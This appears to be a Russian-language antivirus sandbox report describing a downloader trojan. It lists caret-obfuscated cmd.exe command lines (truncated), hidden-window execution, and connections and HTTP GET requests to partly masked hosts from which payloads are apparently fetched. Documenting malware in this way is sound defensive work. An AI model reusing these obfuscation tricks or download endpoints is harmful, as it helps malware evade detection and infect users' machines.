Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' jBpKkRZBLEorY YROpYBtHAvsNZlBrMWNwGZ HoFSiRzrpCDAm & %co^m^S^p^E^c% /c F^O^r , ; ; /^F ; ; ; , ; , ; " tokens= 1 delims=AF3f" , ; , ; , , %^...
Сетевая активность
Подключается к
- 'pi##7.com':80
- 'ph##no.ch':80
- 're###60.co.za':80
- 're###60.co.za':443
- 'sc#####rsand-mueller.de':80
- 'sc#####rsand-mueller.de':443
- 'md#.ge':80
- 'md#.ge':443
TCP
Запросы HTTP GET
- http://pi##7.com/Uhkt
- http://ph##no.ch/h8jnf2uL
- http://re###60.co.za/EwE
- http://sc#####rsand-mueller.de/NiCi
- http://www.ro####-schuhe.de/NiCi
- http://md#.ge/EogJiPjC
Другие
- 're###60.co.za':443
- 'sc#####rsand-mueller.de':443
- 'md#.ge':443
UDP
- DNS ASK pi##7.com
- DNS ASK ph##no.ch
- DNS ASK re###60.co.za
- DNS ASK sc#####rsand-mueller.de
- DNS ASK ro####-schuhe.de
- DNS ASK md#.ge
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' jBpKkRZBLEorY YROpYBtHAvsNZlBrMWNwGZ HoFSiRzrpCDAm & %co^m^S^p^E^c% /c F^O^r , ; ; /^F ; ; ; , ; , ; " tokens= 1 delims=AF3f" , ; , ; , , %^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c f^T^y^p^e | ^F^iN^d^ST^r ^df^i^l
- '<SYSTEM32>\cmd.exe' /S /D /c" fType "
- '<SYSTEM32>\findstr.exe' dfil
- '<SYSTEM32>\cmd.exe' ; ; ; ; 0icXZQFJ/vw3l5 ; , , , ; Im2oAWZXcN/r " ; , , ; , , ( , , , ( , ( , ; , ; , ; , ( , ...
